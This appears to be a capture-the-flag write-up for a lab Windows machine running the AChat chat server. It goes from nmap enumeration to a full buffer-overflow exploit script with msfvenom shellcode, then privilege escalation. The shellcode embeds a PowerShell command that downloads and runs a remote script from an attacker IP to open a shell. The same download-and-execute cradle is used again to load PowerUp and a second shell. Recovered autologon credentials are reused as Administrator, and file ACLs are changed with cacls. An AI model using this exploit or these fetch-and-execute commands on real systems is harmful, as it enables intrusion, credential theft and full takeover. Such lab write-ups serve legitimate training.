Nmap scan

PORT     STATE SERVICE
9255/tcp open  mon
9256/tcp open  unknown

Nmap service scan

nmap -sV -p 9255,9256 10.10.10.74 
Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-24 16:51 CDT
Nmap scan report for 10.10.10.74
Host is up (0.047s latency).

PORT     STATE SERVICE VERSION
9255/tcp open  http    AChat chat system httpd
9256/tcp open  achat   AChat chat system

Enumerate for CVE on AChat

searchsploit achat
-------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                      |  Path
                                                                                                                    | (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Achat 0.150 beta7 - Remote Buffer Overflow                                                                          | exploits/windows/remote/36025.py
Achat 0.150 beta7 - Remote Buffer Overflow (Metasploit)                                                             | exploits/windows/remote/36056.rb
MataChat - 'input.php' Multiple Cross-Site Scripting Vulnerabilities                                                | exploits/php/webapps/32958.txt
Parachat 5.5 - Directory Traversal                                                                                  | exploits/php/webapps/24647.txt`

searchsploit -m 36025

Looking at the payload it seems it only executes calc.exe

# msfvenom -a x86 --platform Windows -p windows/exec CMD=calc.exe -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x
8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb
6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd
\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX 
-f python                                                                                                                                                    
#Payload size: 512 bytes

We can’t use a non-staged because the size would be to large. So instead we can use powershell command to execute a command of our choice.
Example:

CMD="powershell \"IEX(New-Object Net.WebClient).downloadString('http://10.10.14.19/shell.ps1')\""

Using this method we only get a payload size of 674

Viewing buffer size:
p += buf + "A" * (1152 - len(buf))

Final exploit

#!/usr/bin/python
# Author KAhara MAnhara
# Achat 0.150 beta7 - Buffer Overflow
# Tested on Windows 7 32bit

import socket
import sys, time

# msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell \"IEX(New-Object Net.WebClient).downloadString('http://10.10.14.19/shell.ps1')\"" -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python
#Payload size: 512 bytes

buf =  ""
buf += "\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
buf += "\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
buf += "\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41"
buf += "\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51"
buf += "\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31"
buf += "\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41"
buf += "\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41"
buf += "\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41"
buf += "\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41"
buf += "\x47\x42\x39\x75\x34\x4a\x42\x4b\x4c\x6a\x48\x61\x72"
buf += "\x6d\x30\x6b\x50\x4d\x30\x73\x30\x62\x69\x6a\x45\x4e"
buf += "\x51\x77\x50\x30\x64\x64\x4b\x50\x50\x50\x30\x44\x4b"
buf += "\x62\x32\x4a\x6c\x64\x4b\x4f\x62\x6d\x44\x72\x6b\x64"
buf += "\x32\x4f\x38\x6c\x4f\x77\x47\x6d\x7a\x4c\x66\x30\x31"
buf += "\x79\x6f\x54\x6c\x4f\x4c\x30\x61\x73\x4c\x5a\x62\x6e"
buf += "\x4c\x6f\x30\x56\x61\x58\x4f\x6c\x4d\x49\x71\x39\x37"
buf += "\x79\x52\x48\x72\x51\x42\x71\x47\x62\x6b\x70\x52\x6c"
buf += "\x50\x42\x6b\x4d\x7a\x4f\x4c\x54\x4b\x50\x4c\x4a\x71"
buf += "\x72\x58\x37\x73\x30\x48\x6d\x31\x36\x71\x30\x51\x54"
buf += "\x4b\x4f\x69\x6b\x70\x69\x71\x47\x63\x72\x6b\x30\x49"
buf += "\x4c\x58\x57\x73\x4c\x7a\x51\x39\x72\x6b\x6f\x44\x64"
buf += "\x4b\x79\x71\x4a\x36\x4c\x71\x6b\x4f\x56\x4c\x57\x51"
buf += "\x38\x4f\x6a\x6d\x49\x71\x79\x37\x50\x38\x49\x50\x64"
buf += "\x35\x6b\x46\x6b\x53\x33\x4d\x6b\x48\x4d\x6b\x61\x6d"
buf += "\x6c\x64\x54\x35\x39\x54\x30\x58\x74\x4b\x32\x38\x6d"
buf += "\x54\x4a\x61\x58\x53\x6f\x76\x74\x4b\x6a\x6c\x30\x4b"
buf += "\x42\x6b\x30\x58\x4d\x4c\x7a\x61\x46\x73\x32\x6b\x4d"
buf += "\x34\x44\x4b\x49\x71\x5a\x30\x61\x79\x71\x34\x6f\x34"
buf += "\x4b\x74\x61\x4b\x6f\x6b\x30\x61\x6f\x69\x4e\x7a\x70"
buf += "\x51\x49\x6f\x37\x70\x51\x4f\x31\x4f\x4e\x7a\x34\x4b"
buf += "\x4b\x62\x5a\x4b\x52\x6d\x61\x4d\x71\x5a\x5a\x61\x34"
buf += "\x4d\x42\x65\x55\x62\x69\x70\x39\x70\x69\x70\x6e\x70"
buf += "\x53\x38\x4d\x61\x52\x6b\x70\x6f\x64\x47\x79\x6f\x69"
buf += "\x45\x55\x6b\x68\x70\x64\x75\x63\x72\x42\x36\x63\x38"
buf += "\x34\x66\x42\x75\x65\x6d\x55\x4d\x4b\x4f\x47\x65\x4f"
buf += "\x4c\x5a\x66\x33\x4c\x39\x7a\x51\x70\x59\x6b\x59\x50"
buf += "\x53\x45\x6b\x55\x75\x6b\x71\x37\x6a\x73\x52\x52\x62"
buf += "\x4f\x32\x4a\x6b\x50\x72\x33\x69\x6f\x47\x65\x54\x30"
buf += "\x32\x4f\x54\x37\x50\x65\x62\x52\x33\x43\x73\x38\x43"
buf += "\x35\x42\x4c\x32\x4c\x4f\x30\x6b\x72\x4e\x69\x4e\x65"
buf += "\x50\x58\x6d\x58\x4e\x6e\x30\x65\x42\x57\x6c\x6d\x4e"
buf += "\x6f\x6f\x72\x52\x4a\x43\x35\x70\x63\x70\x74\x4f\x30"
buf += "\x4e\x6e\x52\x45\x62\x54\x4e\x4e\x4e\x77\x31\x55\x43"
buf += "\x32\x4e\x63\x50\x6c\x31\x59\x52\x45\x70\x6e\x71\x64"
buf += "\x6e\x49\x6c\x6e\x50\x64\x72\x4f\x31\x67\x62\x4e\x52"
buf += "\x4c\x62\x4f\x4f\x71\x50\x64\x30\x53\x52\x54\x63\x42"
buf += "\x72\x49\x52\x4e\x73\x37\x4d\x58\x6c\x67\x71\x58\x32"
buf += "\x54\x50\x74\x34\x30\x6e\x5a\x4c\x6f\x6e\x4f\x70\x31"
buf += "\x6c\x70\x6e\x4e\x4c\x71\x70\x30\x4e\x4e\x4d\x61\x50"
buf += "\x34\x4e\x4e\x70\x31\x50\x39\x6e\x4f\x32\x53\x50\x68"
buf += "\x6f\x75\x70\x6c\x62\x4c\x6e\x4e\x74\x30\x63\x43\x4c"
buf += "\x71\x6e\x47\x4d\x59\x6d\x52\x4b\x50\x41\x41"

print "---->{P00F}!"
i=0
while i<len(p):
    if i > 172000:
        time.sleep(1.0)
    sent = sock.sendto(p[i:(i+8192)], server_address)
    i += sent
sock.close()

user.txt 72290246df<redacted>

Privesc

See what tokens we have

whoami /all

USER INFORMATION
----------------

User Name         SID                                          
================= =============================================
chatterbox\alfred S-1-5-21-1218242403-4263168573-589647361-1000


GROUP INFORMATION
-----------------

Group Name                             Type             SID          Attributes                                        
====================================== ================ ============ ==================================================
Everyone                               Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                          Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE               Well-known group S-1-5-4      Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                          Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users       Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization         Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account             Well-known group S-1-5-113    Mandatory group, Enabled by default, Enabled group
LOCAL                                  Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication       Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label            S-1-16-8192  Mandatory group, Enabled by default, Enabled group


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State   
============================= ==================================== ========
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled 
SeUndockPrivilege             Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled
SeTimeZonePrivilege           Change the time zone                 Disabled

Receiving PowerUp
IEX(New-Object Net.WebClient).downloadString('http://10.10.14.19/PowerUp.ps1')

Now powerup is loaded into memory, we can call it from our shell
Invoke-AllChecks

[*] Checking for Autologon credentials in registry...                                                                                                                                                                                                                                                                                                                                                                                                        
DefaultDomainName    :
DefaultUserName      : Alfred
DefaultPassword      : Welcome1!
AltDefaultDomainName :
AltDefaultUserName   :
AltDefaultPassword   :

Convert password to secure string

$SecPass = ConvertTo-SecureString 'Welcome1!' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('Administrator', $SecPass)
$cred

UserName                                                               Password
--------                                                               --------
Administrator                                      System.Security.SecureString

Start-Process -FilePath "powershell" -argumentlist "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.19/shell2.ps1')" -Credential $cred

root.txt a673d1b1fa95c<redacted>

Additional method would be to modify the ACL using cacls.exe

Get-Acl root.txt | fl *

cacls root.txt /t /e /p Alfred:F